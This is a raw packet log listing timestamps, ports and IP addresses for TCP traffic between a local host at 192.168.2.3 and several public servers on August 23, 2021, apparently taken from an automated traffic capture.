Aug 23, 2021 02:09:07.844711065 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.844733000 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.844747066 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.846566916 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.846590042 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.846669912 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.846700907 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.847042084 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.847246885 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.850735903 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.870513916 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.870559931 CEST	49818	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.872315884 CEST	80	49819	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.872394085 CEST	49819	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.872595072 CEST	49822	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.894845009 CEST	80	49817	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:07.895932913 CEST	80	49818	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.896004915 CEST	49818	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.897799015 CEST	80	49822	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.898539066 CEST	49822	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.906078100 CEST	49822	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.906637907 CEST	80	49810	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.906709909 CEST	49810	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.926742077 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.926989079 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.927666903 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.927692890 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.927956104 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.928103924 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.931382895 CEST	80	49822	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.932229996 CEST	80	49822	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.932281971 CEST	80	49822	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:07.932398081 CEST	49822	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.932420015 CEST	49822	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:07.983894110 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.984085083 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.984261990 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.984426022 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.984595060 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.984677076 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.984692097 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.984721899 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.984790087 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.984838009 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.985299110 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.985320091 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.985375881 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.985434055 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.985548973 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.985621929 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.985656977 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.985785007 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.985807896 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.985894918 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:07.986265898 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:07.986351013 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.040505886 CEST	49822	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.040618896 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.040657043 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.040679932 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.040756941 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.040790081 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.040832996 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.041012049 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.042129040 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.042279005 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.042360067 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.042464018 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.042572021 CEST	49823	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.066118956 CEST	80	49822	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.068780899 CEST	80	49823	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.068948984 CEST	49823	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.069664001 CEST	49822	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.070200920 CEST	49823	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.089903116 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.090034008 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.095463037 CEST	80	49823	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.095985889 CEST	80	49823	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.096015930 CEST	80	49823	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.096128941 CEST	49823	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.096792936 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.096863031 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.096973896 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.097039938 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.097168922 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.097409964 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.098649979 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.098725080 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.098819017 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.098891020 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.099006891 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.099168062 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.099282980 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.099404097 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.145952940 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.152996063 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.153017044 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.153230906 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.170659065 CEST	49820	25802	192.168.2.3	188.124.36.242
Aug 23, 2021 02:09:08.195074081 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.195499897 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.212199926 CEST	49823	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.213310957 CEST	49824	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.237478971 CEST	80	49823	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.238481045 CEST	80	49824	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.238610029 CEST	49823	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.238671064 CEST	49824	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.239398003 CEST	49824	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.264647961 CEST	80	49824	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.265212059 CEST	80	49824	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.265223980 CEST	80	49824	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.265310049 CEST	49824	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.268636942 CEST	25802	49820	188.124.36.242	192.168.2.3
Aug 23, 2021 02:09:08.398399115 CEST	49824	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.409523964 CEST	49825	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.424190998 CEST	80	49824	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.424268961 CEST	49824	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.435123920 CEST	80	49825	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.435395002 CEST	49825	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.453891993 CEST	49825	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.457139015 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.480628014 CEST	80	49825	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.481710911 CEST	80	49825	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.481750965 CEST	80	49825	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.481920004 CEST	49825	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.481981039 CEST	49825	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.483303070 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.483916998 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.485505104 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.485663891 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.485954046 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.486145973 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.512022972 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.512056112 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.512069941 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.512099028 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.512124062 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.512147903 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.512178898 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.512201071 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.512232065 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.512281895 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.512301922 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.512707949 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.513248920 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.523999929 CEST	49820	25802	192.168.2.3	188.124.36.242
Aug 23, 2021 02:09:08.538080931 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.538194895 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.538413048 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.538455963 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.538609982 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.538625002 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.538630962 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.538840055 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.539180040 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.539297104 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.539328098 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.539340019 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.539349079 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.539637089 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.565454960 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.565507889 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.565531969 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.565558910 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.565607071 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.566616058 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.566659927 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.566689014 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.566715956 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.566740990 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.566764116 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.566787958 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.566809893 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.566833019 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.567303896 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.567346096 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.567379951 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.567413092 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.592184067 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.593802929 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.595294952 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.595417023 CEST	80	49826	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.595506907 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.608091116 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.608182907 CEST	49826	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.608359098 CEST	49825	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.627926111 CEST	25802	49820	188.124.36.242	192.168.2.3
Aug 23, 2021 02:09:08.633578062 CEST	80	49825	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.633697033 CEST	49825	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.636291981 CEST	49827	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.639177084 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.642080069 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.664149046 CEST	80	49827	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.664482117 CEST	49827	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.672466993 CEST	49827	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.695647001 CEST	80	49821	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.695825100 CEST	49821	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.697710037 CEST	80	49827	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.698461056 CEST	80	49827	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.698493004 CEST	80	49827	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.698584080 CEST	49827	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.698615074 CEST	49827	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.702672958 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.702841043 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.706981897 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.707165956 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.707505941 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.723609924 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.767472982 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.767585993 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.767779112 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.767915964 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.767987967 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.768124104 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.768244982 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.768342972 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.768351078 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.768455982 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.768621922 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.768728971 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.768954992 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.769198895 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.769314051 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.769475937 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.769572973 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.769664049 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.785413980 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.785605907 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.785624981 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.785737991 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.828084946 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.828170061 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.828269958 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.828283072 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.828363895 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.828377962 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.828428984 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.828557968 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.828588963 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.828661919 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.829365015 CEST	49827	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.831317902 CEST	49829	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.837968111 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.837994099 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.838115931 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.838193893 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.846971035 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.846992016 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.847065926 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.847157955 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.854671001 CEST	80	49827	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.854811907 CEST	49827	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.856391907 CEST	80	49817	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:08.856420040 CEST	80	49817	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:08.856432915 CEST	80	49829	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.856523037 CEST	49817	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:08.856559038 CEST	49817	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:08.856583118 CEST	49829	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.863256931 CEST	49829	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.888479948 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.888511896 CEST	80	49829	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.888560057 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.888576984 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.888669968 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:08.888783932 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.888854980 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.889097929 CEST	80	49829	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.889121056 CEST	80	49829	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:08.889199972 CEST	49829	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.889245987 CEST	49829	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:08.891196966 CEST	49830	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:08.898356915 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.898384094 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.898399115 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.898577929 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.898741007 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.907331944 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.907358885 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.907516956 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.907622099 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.948970079 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:08.949001074 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.003400087 CEST	80	49828	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:09.003508091 CEST	49828	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:09.019931078 CEST	49829	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.022161007 CEST	49831	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.045237064 CEST	80	49829	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.045329094 CEST	49829	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.047363997 CEST	80	49831	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.047451973 CEST	49831	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.048270941 CEST	49831	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.074013948 CEST	80	49831	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.074969053 CEST	80	49831	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.075011015 CEST	80	49831	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.075051069 CEST	49831	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.075090885 CEST	49831	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.131212950 CEST	80	49817	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:09.203938961 CEST	49831	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.204232931 CEST	80	49830	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:09.204483986 CEST	49830	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:09.204499960 CEST	49830	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:09.204504013 CEST	49830	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:09.228837013 CEST	49832	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.229324102 CEST	80	49831	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.229438066 CEST	49831	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.254112959 CEST	80	49832	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.254234076 CEST	49832	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.255222082 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.255336046 CEST	49832	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.280396938 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.280432940 CEST	80	49832	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.280514002 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.281217098 CEST	80	49832	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.281234026 CEST	80	49832	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.281318903 CEST	49832	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.281343937 CEST	49832	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.291332960 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.291584015 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.291906118 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.292223930 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.316735029 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.316776037 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.317328930 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.317397118 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.317461967 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.317476034 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.317487955 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.317500114 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.317575932 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.317523956 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.317594051 CEST	49833	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:09.317620039 CEST	80	49833	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:09.317662001 CEST	49833	80	192.168.2.3	185.206.180.136
